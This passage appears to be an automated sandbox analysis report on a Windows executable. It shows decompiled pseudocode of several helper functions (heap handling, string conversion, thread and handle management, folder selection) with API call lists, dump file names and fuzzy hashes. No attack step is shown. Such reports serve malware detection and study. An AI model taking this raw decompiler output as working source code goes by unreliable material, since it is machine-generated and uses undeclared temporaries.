                                        0x004066d0
                                        0x004066d4
                                        0x00000000
                                        0x004066d4
                                        0x00406681
                                        0x00000000
                                        0x00406675
                                        0x004066f0
                                        0x004066f0
                                        0x00000000

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: CharLower
                                        • String ID:
                                        • API String ID: 1615517891-0
                                        • Opcode ID: dd20185b596db2745f2b704bac9dd4eb7d3bfe8c6e03a6d263d02bee93d56928
                                        • Instruction ID: d2bb3b3139d3a07d6b63dd94e99d63a1d481d45b300203dd96ee95a90623a32e
                                        • Opcode Fuzzy Hash: dd20185b596db2745f2b704bac9dd4eb7d3bfe8c6e03a6d263d02bee93d56928
                                        • Instruction Fuzzy Hash: A5214875A083198BC710AF59DC40477B3E4EB80760F46483BFC85A3340DA3AED159BB9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040E770, Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0040E770(void* __ecx, void** _a4, wchar_t* _a8) {
				int _v8;
				void* _t40;
				void* _t43;
				void* _t45;

				_v8 = 0;
				if(_a8 == 0) {
					if( *_a4 != 0) {
						_t40 =  *0x418788; // 0x22f0000
						HeapFree(_t40, 0,  *_a4);
						 *_a4 = 0;
					}
				} else {
					_v8 = wcslen(_a8);
					if( *_a4 != 0) {
						_t12 = _v8 + 0xa; // 0xa
						_t43 =  *0x418788; // 0x22f0000
						 *_a4 = RtlReAllocateHeap(_t43, 0,  *_a4, _v8 + _t12);
					} else {
						_t8 = _v8 + 0xa; // 0xa
						_t45 =  *0x418788; // 0x22f0000
						 *_a4 = RtlAllocateHeap(_t45, 0, _v8 + _t8);
					}
					E0040E9A0(_a8,  *_a4, _a8, _v8);
				}
				return _v8 + _v8 + 2;
			}







                                        0x0040e774
                                        0x0040e77f
                                        0x0040e7f3
                                        0x0040e7fd
                                        0x0040e804
                                        0x0040e80d
                                        0x0040e80d
                                        0x0040e781
                                        0x0040e78d
                                        0x0040e796
                                        0x0040e7b9
                                        0x0040e7c6
                                        0x0040e7d6
                                        0x0040e798
                                        0x0040e79b
                                        0x0040e7a2
                                        0x0040e7b2
                                        0x0040e7b2
                                        0x0040e7e6
                                        0x0040e7e6
                                        0x0040e81d

                                        APIs
                                        • wcslen.MSVCRT ref: 0040E785
                                        • RtlAllocateHeap.KERNEL32(022F0000,00000000,0000000A), ref: 0040E7A9
                                        • RtlReAllocateHeap.KERNEL32(022F0000,00000000,00000000,0000000A), ref: 0040E7CD
                                        • HeapFree.KERNEL32(022F0000,00000000,00000000,?,?,0040506F,?,0041702A,00401095,00000000), ref: 0040E804
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: Heap$Allocate$Freewcslen
                                        • String ID:
                                        • API String ID: 584413571-0
                                        • Opcode ID: 74d66745f12c6d13c106ddefa97dbd3dca822ed2ddd05241026e1d0951c1ef46
                                        • Instruction ID: 9859c1d97a6b16d9a0283f12d9962f11ecb48471b7a27ca02360df79034512cd
                                        • Opcode Fuzzy Hash: 74d66745f12c6d13c106ddefa97dbd3dca822ed2ddd05241026e1d0951c1ef46
                                        • Instruction Fuzzy Hash: 1A212774604209EFDB14CF94D884FAAB7B9EB49314F10C169F9099B390D735EA81CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00412520, Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00412520(short* _a4) {
				void* _t6;
				short _t7;
				int _t12;
				short* _t13;
				short* _t17;
				char* _t18;
				short* _t19;
				int _t20;
				void* _t21;

				_t19 = _a4;
				if(_t19 == 0) {
					L6:
					_t6 = malloc(1);
					 *_t6 = 0;
					return _t6;
				} else {
					_t13 = _t19;
					_t2 =  &(_t13[1]); // 0x2
					_t17 = _t2;
					do {
						_t7 =  *_t13;
						_t13 =  &(_t13[1]);
					} while (_t7 != 0);
					_t3 = (_t13 - _t17 >> 1) + 1; // -1
					_t20 = _t3;
					_t12 = WideCharToMultiByte(0xfde9, 0, _t19, _t20, 0, 0, 0, 0);
					if(_t12 == 0) {
						goto L6;
					} else {
						_t4 = _t12 + 1; // 0x1
						_t18 = malloc(_t4);
						_t21 = _t21 + 4;
						if(_t18 == 0) {
							goto L6;
						} else {
							_t18[WideCharToMultiByte(0xfde9, 0, _t19, _t20, _t18, _t12, 0, 0)] = 0;
							return _t18;
						}
					}
				}
			}












                                        0x00412523
                                        0x0041252a
                                        0x00412594
                                        0x00412596
                                        0x0041259e
                                        0x004125a5
                                        0x0041252c
                                        0x0041252c
                                        0x0041252e
                                        0x0041252e
                                        0x00412531
                                        0x00412531
                                        0x00412534
                                        0x00412537
                                        0x00412548
                                        0x00412548
                                        0x0041255a
                                        0x0041255e
                                        0x00000000
                                        0x00412560
                                        0x00412560
                                        0x00412569
                                        0x0041256b
                                        0x00412570
                                        0x00000000
                                        0x00412572
                                        0x00412587
                                        0x00412591
                                        0x00412591
                                        0x00412570
                                        0x0041255e

                                        APIs
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0040D6D8,00000000), ref: 00412554
                                        • malloc.MSVCRT ref: 00412564
                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,-00000001,00000000,00000000,00000000,00000000,00000000), ref: 00412581
                                        • malloc.MSVCRT ref: 00412596
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: ByteCharMultiWidemalloc
                                        • String ID:
                                        • API String ID: 2735977093-0
                                        • Opcode ID: b48cb03bbcfa25e2855a71309bb95cfc01aaa3e591854047cecb00b7842772c2
                                        • Instruction ID: 6c6aa570ed8922313693bfdacf45f67401c41b3e5a5f9c88c16c0badf32549c3
                                        • Opcode Fuzzy Hash: b48cb03bbcfa25e2855a71309bb95cfc01aaa3e591854047cecb00b7842772c2
                                        • Instruction Fuzzy Hash: 1D01453B34130137E7205695AC52FB73B5ACB85B95F19007AFB009E2C0D6F7A90086B9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004125C0, Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E004125C0(short* _a4) {
				void* _t6;
				short _t7;
				int _t12;
				short* _t13;
				short* _t17;
				char* _t18;
				short* _t19;
				int _t20;
				void* _t21;

				_t19 = _a4;
				if(_t19 == 0) {
					L6:
					_t6 = malloc(1);
					 *_t6 = 0;
					return _t6;
				} else {
					_t13 = _t19;
					_t17 =  &(_t13[1]);
					do {
						_t7 =  *_t13;
						_t13 =  &(_t13[1]);
					} while (_t7 != 0);
					_t20 = (_t13 - _t17 >> 1) + 1;
					_t12 = WideCharToMultiByte(0, 0, _t19, _t20, 0, 0, 0, 0);
					if(_t12 == 0) {
						goto L6;
					} else {
						_t4 = _t12 + 1; // 0x1
						_t18 = malloc(_t4);
						_t21 = _t21 + 4;
						if(_t18 == 0) {
							goto L6;
						} else {
							_t18[WideCharToMultiByte(0, 0, _t19, _t20, _t18, _t12, 0, 0)] = 0;
							return _t18;
						}
					}
				}
			}












                                        0x004125c3
                                        0x004125ca
                                        0x0041262e
                                        0x00412630
                                        0x00412638
                                        0x0041263f
                                        0x004125cc
                                        0x004125cc
                                        0x004125ce
                                        0x004125d1
                                        0x004125d1
                                        0x004125d4
                                        0x004125d7
                                        0x004125e8
                                        0x004125f7
                                        0x004125fb
                                        0x00000000
                                        0x004125fd
                                        0x004125fd
                                        0x00412606
                                        0x00412608
                                        0x0041260d
                                        0x00000000
                                        0x0041260f
                                        0x00412621
                                        0x0041262b
                                        0x0041262b
                                        0x0041260d
                                        0x004125fb

                                        APIs
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004125F1
                                        • malloc.MSVCRT ref: 00412601
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041261B
                                        • malloc.MSVCRT ref: 00412630
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: ByteCharMultiWidemalloc
                                        • String ID:
                                        • API String ID: 2735977093-0
                                        • Opcode ID: 14625c4c1fa5056141ce799ffc352ae27d7848cf21d8a3805aaf97c58f661503
                                        • Instruction ID: 3a4dbcb0c667a52d2e855db32868f3c1ff7ab87affde7959171d7d1382035f3f
                                        • Opcode Fuzzy Hash: 14625c4c1fa5056141ce799ffc352ae27d7848cf21d8a3805aaf97c58f661503
                                        • Instruction Fuzzy Hash: 3B01413B3413003BE3204685AC42FA73B59CB81B95F19007AFB00AE2C0DAF7A80082B8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040DAB8, Relevance: 6.1, APIs: 4, Instructions: 56memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 31%
                                        			E0040DAB8(signed int _a4) {
				long _t26;
				signed int _t29;
				long* _t36;
				signed int _t40;
				long* _t41;
				intOrPtr _t42;

				_t41 = _a4;
				_t2 =  &(_t41[8]); // 0x20
				_t36 = _t2;
				 *0x41750c(_t36);
				_t40 = _a4;
				if(_t40 != 0xffffffff) {
					if(_t40 >= _t41[2]) {
						_t29 = _t41[1] + _t40;
						_t41[2] = _t29;
						_t41[3] = RtlReAllocateHeap( *0x418068, 8, _t41[3], _t29 << 2);
					}
					if( *((intOrPtr*)(_t41[3] + _t40 * 4)) == 0) {
						 *((intOrPtr*)(_t41[3] + _t40 * 4)) = RtlAllocateHeap( *0x418068, 8,  *_t41);
					} else {
						_t26 = _t41[5];
						if(_t26 != 0) {
							 *_t26(_t40);
						}
					}
					_t42 =  *((intOrPtr*)(_t41[3] + _t40 * 4));
				} else {
					_push( *_t41 + 8);
					_t4 =  &(_t41[4]); // 0x10
					_t42 = E0040E192(_t4);
				}
				 *0x417514(_t36);
				return _t42;
			}









                                        0x0040daba
                                        0x0040dabf
                                        0x0040dabf
                                        0x0040dac3
                                        0x0040dac9
                                        0x0040dad0
                                        0x0040daea
                                        0x0040daef
                                        0x0040daf1
                                        0x0040db09
                                        0x0040db09
                                        0x0040db13
                                        0x0040db34
                                        0x0040db15
                                        0x0040db15
                                        0x0040db1a
                                        0x0040db1d
                                        0x0040db1d
                                        0x0040db1a
                                        0x0040db3a
                                        0x0040dad2
                                        0x0040dad7
                                        0x0040dad8
                                        0x0040dae3
                                        0x0040dae3
                                        0x0040db3e
                                        0x0040db49

                                        APIs
                                        • RtlEnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040B3F5,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000), ref: 0040DAC3
                                        • RtlReAllocateHeap.KERNEL32(00000008,?,?,?,00000000,0040B3F5,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?), ref: 0040DB03
                                        • RtlLeaveCriticalSection.KERNEL32(00000020,?,00000000,0040B3F5,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040DB3E
                                          • Part of subcall function 0040E192: RtlAllocateHeap.KERNEL32(00000008,00000000,0040DA0C,00418670,00000014,?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040E19E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: AllocateCriticalHeapSection$EnterLeave
                                        • String ID:
                                        • API String ID: 3625150316-0
                                        • Opcode ID: 5d9d41e9d09ba23bc41a935226fc724bd5eb564a4c229014a10cb91462bf3418
                                        • Instruction ID: 5d30594c5d4cb8bdcb3ac415f305c1461eb0469a0f220f7444716fdb390beb46
                                        • Opcode Fuzzy Hash: 5d9d41e9d09ba23bc41a935226fc724bd5eb564a4c229014a10cb91462bf3418
                                        • Instruction Fuzzy Hash: 81113D72604600AFC3208F68DC40D56B7FAEB48361B15892EE596E36A0D734F844DF65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040DCFD, Relevance: 6.0, APIs: 4, Instructions: 44memoryCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 37%
                                        			E0040DCFD(void** _a4) {
				void* _t9;
				void* _t10;
				void** _t17;
				void* _t18;
				void* _t19;

				_t17 = _a4;
				if(_t17[7] != 0) {
					_t3 =  &(_t17[8]); // 0x20
					 *0x41750c(_t3);
				}
				_t9 = _t17[1];
				if(_t9 != 0) {
					do {
						_t19 =  *_t9;
						HeapFree( *0x418068, 0, _t9);
						_t9 = _t19;
					} while (_t19 != 0);
				}
				_t10 =  *_t17;
				if(_t10 != 0) {
					do {
						_t18 =  *_t10;
						HeapFree( *0x418068, 0, _t10);
						_t10 = _t18;
					} while (_t18 != 0);
				}
				 *_t17 = 0;
				_t17[1] = 0;
				_t17[3] = 0;
				if(_t17[7] != 0) {
					_t8 =  &(_t17[8]); // 0x20
					return  *0x417514(_t8);
				}
				return _t10;
			}








                                        0x0040dd00
                                        0x0040dd09
                                        0x0040dd0b
                                        0x0040dd0f
                                        0x0040dd0f
                                        0x0040dd15
                                        0x0040dd1a
                                        0x0040dd1c
                                        0x0040dd1c
                                        0x0040dd26
                                        0x0040dd2c
                                        0x0040dd2e
                                        0x0040dd1c
                                        0x0040dd32
                                        0x0040dd36
                                        0x0040dd38
                                        0x0040dd38
                                        0x0040dd42
                                        0x0040dd48
                                        0x0040dd4a
                                        0x0040dd38
                                        0x0040dd4e
                                        0x0040dd50
                                        0x0040dd53
                                        0x0040dd59
                                        0x0040dd5b
                                        0x00000000
                                        0x0040dd5f
                                        0x0040dd68

                                        APIs
                                        • RtlEnterCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040DFDE,00000000,00000000,?,0040A508,?,00000000,00000200,?,?,0040A40F,00000200), ref: 0040DD0F
                                        • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040DFDE,00000000,00000000,?,0040A508,?,00000000,00000200,?,?,0040A40F), ref: 0040DD26
                                        • HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040DFDE,00000000,00000000,?,0040A508,?,00000000,00000200,?,?,0040A40F), ref: 0040DD42
                                        • RtlLeaveCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040DFDE,00000000,00000000,?,0040A508,?,00000000,00000200,?,?,0040A40F,00000200), ref: 0040DD5F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: CriticalFreeHeapSection$EnterLeave
                                        • String ID:
                                        • API String ID: 1298188129-0
                                        • Opcode ID: b3beb58b6f71b40006eb08016dd7c334f266477d507c334884bffe37f11cccde
                                        • Instruction ID: 6fca480e40431d2402ba504a238040f57fc68e2477d5316dff391bea61d1b50d
                                        • Opcode Fuzzy Hash: b3beb58b6f71b40006eb08016dd7c334f266477d507c334884bffe37f11cccde
                                        • Instruction Fuzzy Hash: 4A012C75A0161ABFC7208F96ED049A7BB78FF49751345813AA804A7660C734E825CFE8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040AF8C, Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                        Download Yara Rule
                                        APIs
                                        • SHGetFolderLocation.SHELL32(00000000,022F97F8,00000000,00000000,00000000,00000000,00000000,?,00000104,0040AF3B,00000000,00000000,00000104,?), ref: 0040AF9E
                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040AFAF
                                        • wcslen.MSVCRT ref: 0040AFBA
                                        • 73E3A680.OLE32(00000000,?,00000104,0040AF3B,00000000,00000000,00000104,?,?,?,?,00000009,0040373D,00000001,00000000,00000000), ref: 0040AFD8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: A680FolderFromListLocationPathwcslen
                                        • String ID:
                                        • API String ID: 4280286715-0
                                        • Opcode ID: ab757114e40f8e30c8bef7bf1ea6b1bea132ddca49084f9c573e3a3fba1941d5
                                        • Instruction ID: 7a2902c180dcc43b03150bc8a958d3cac97d61a7a1c647d5a439272dc82e4934
                                        • Opcode Fuzzy Hash: ab757114e40f8e30c8bef7bf1ea6b1bea132ddca49084f9c573e3a3fba1941d5
                                        • Instruction Fuzzy Hash: EEF0AF36504A25BBC7215B6ADC09EAFBF79EF057B0B404236F805E6250EB319D20E7E5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00405430, Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 58%
                                        			E00405430(long _a4) {
				long _t12;
				intOrPtr* _t13;

				_t12 = _a4;
				TerminateThread(E004053E4(), _t12);
				 *0x41750c(0x418708, 0);
				_t13 =  *0x41811c; // 0x0
				while(_t13 != 0) {
					if( *((intOrPtr*)(_t13 + 0xc)) == _t12) {
						_t14 = _t13 + 8;
						CloseHandle( *(_t13 + 8));
						E0040E152(0x41811c, _t14);
					} else {
						_t13 =  *_t13;
						continue;
					}
					L6:
					return  *0x417514(0x418708);
				}
				goto L6;
			}





                                        0x00405433
                                        0x00405440
                                        0x0040544c
                                        0x00405452
                                        0x00405461
                                        0x0040545d
                                        0x00405467
                                        0x0040546c
                                        0x00405478
                                        0x0040545f
                                        0x0040545f
                                        0x00000000
                                        0x0040545f
                                        0x0040547f
                                        0x00405489
                                        0x00405489
                                        0x00000000

                                        APIs
                                          • Part of subcall function 004053E4: RtlEnterCriticalSection.KERNEL32(00418708,?,?,-0000012C,004053CA,00000000,00401FD6,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000), ref: 004053EF
                                          • Part of subcall function 004053E4: RtlLeaveCriticalSection.KERNEL32(00418708,?,?,-0000012C,004053CA,00000000,00401FD6,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000), ref: 00405422
                                        • TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000), ref: 00405440
                                        • RtlEnterCriticalSection.KERNEL32(00418708,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040544C
                                        • CloseHandle.KERNEL32(-00000008,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040546C
                                          • Part of subcall function 0040E152: HeapFree.KERNEL32(00000000,-00000008,0040DA6B,00000010,00000800,?,00000000,?,?,00000000,00403350,00000000,00000000,00000000,00000000,?), ref: 0040E18B
                                        • RtlLeaveCriticalSection.KERNEL32(00418708,?,?,-0000012C,00401FE5,00000000,-0000012C,00402366,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405480
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: CriticalSection$EnterLeave$CloseFreeHandleHeapTerminateThread
                                        • String ID:
                                        • API String ID: 85618057-0
                                        • Opcode ID: be79b443d5972bd681091ed05d4b22618ed934695998c5f90ab991cc6a18f9e1
                                        • Instruction ID: 316be6e713bae10afbb7666a0dc63c1dca656240e3f2948c26316823db471a7f
                                        • Opcode Fuzzy Hash: be79b443d5972bd681091ed05d4b22618ed934695998c5f90ab991cc6a18f9e1
                                        • Instruction Fuzzy Hash: F1F0E233404610FBC6206B619C49EE77779EF55767724883FF94572291CB386841CE6D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00409967, Relevance: 6.0, APIs: 4, Instructions: 26COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00409967(void* __ecx, void** _a4) {
				void* _v8;
				void* _t5;
				void* _t7;
				void** _t11;

				_t5 = GetCurrentProcess();
				_t11 = _a4;
				_t7 = DuplicateHandle(GetCurrentProcess(),  *_t11, _t5,  &_v8, 0, 0, 2);
				if(_t7 != 0) {
					CloseHandle( *_t11);
					_t7 = _v8;
					 *_t11 = _t7;
				}
				return _t7;
			}







                                        0x00409976
                                        0x0040997c
                                        0x00409989
                                        0x00409991
                                        0x00409995
                                        0x0040999b
                                        0x0040999e
                                        0x0040999e
                                        0x004099a4

                                        APIs
                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,00000000,?,?,00409B4F,?), ref: 00409976
                                        • GetCurrentProcess.KERNEL32(?,00000000,?,?,00409B4F,?), ref: 00409982
                                        • DuplicateHandle.KERNEL32(00000000,?,?,00409B4F,?), ref: 00409989
                                        • CloseHandle.KERNEL32(?,?,?,00409B4F,?), ref: 00409995
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500408085.0000000000419000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500484490.000000000045B000.00000002.00020000.sdmp Download File
                                        Similarity
                                        • API ID: CurrentHandleProcess$CloseDuplicate
                                        • String ID:
                                        • API String ID: 1410216518-0
                                        • Opcode ID: 4852cd940a62ffebd97bec63e7d75145fa92973f44f615ba9ebe136649e88543
                                        • Instruction ID: dd6ca817a1ad091c06377a859ca267dcdfe19b2b79fa52ea566f5e59c50071d7
                                        • Opcode Fuzzy Hash: 4852cd940a62ffebd97bec63e7d75145fa92973f44f615ba9ebe136649e88543
                                        • Instruction Fuzzy Hash: F1E0ED75608209BFEB109F91DC49F9ABB7DEB45741F104065F904D2660EB71AD11CB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00402FAD, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 193COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040E600: TlsGetValue.KERNEL32(0000001B,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417060), ref: 0040E617
                                          • Part of subcall function 0040E4C0: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E4C6
                                          • Part of subcall function 0040E4C0: TlsGetValue.KERNEL32(0000001B), ref: 0040E4D5
                                          • Part of subcall function 0040E4C0: SetLastError.KERNEL32(?), ref: 0040E4EB
                                          • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                          • Part of subcall function 00405E50: CharUpperW.USER32(00000000,00000000,FFFFFFF5,00001000,00001000,?,?,00001000,00402F92,00000000,00000008,00000001,00000000,00000000,00000000,00000000), ref: 00405EA1
                                          • Part of subcall function 0040E500: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040E50C
                                          • Part of subcall function 0040E500: RtlAllocateHeap.NTDLL(022F0000,00000000,?), ref: 0040E539
                                          • Part of subcall function 0040E500: RtlReAllocateHeap.NTDLL(022F0000,00000000,?,?), ref: 0040E55C
                                          • Part of subcall function 00402E49: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402E71
                                          • Part of subcall function 004092F5: CoInitialize.OLE32(00000000), ref: 00409313
                                          • Part of subcall function 004092F5: memset.MSVCRT ref: 00409321
                                          • Part of subcall function 004092F5: LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040932E
                                          • Part of subcall function 004092F5: GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 00409350
                                          • Part of subcall function 004092F5: GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 0040935C
                                          • Part of subcall function 004092F5: wcsncpy.MSVCRT ref: 0040937D
                                          • Part of subcall function 004092F5: wcslen.MSVCRT ref: 00409391
                                          • Part of subcall function 004092F5: 73E3A680.OLE32(?), ref: 0040941A
                                          • Part of subcall function 004092F5: wcslen.MSVCRT ref: 00409421
                                          • Part of subcall function 004092F5: FreeLibrary.KERNEL32(00000000,00000000), ref: 00409440
                                          • Part of subcall function 00403E37: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,-00000004,00403A0D,00000000,00000001,00000000,00000000,00000001,00000003,00000000), ref: 00403E67
                                        • PathAddBackslashW.SHLWAPI(00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000,00000000,FFFFFFF5,00000003,00000000,00000000,00000000,00000000,00000000), ref: 00403178
                                          • Part of subcall function 0040E660: wcslen.MSVCRT ref: 0040E677
                                        • PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,022F4B68,00000000,00000000,00000200,00000000,00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000), ref: 004031DD
                                          • Part of subcall function 00402C55: FindResourceW.KERNEL32(?,0000000A,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402CF0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.500372099.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.500367164.0000000000400000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500385946.0000000000413000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.500401597.0000000000417000.00000004.00020000.sdmp Download File
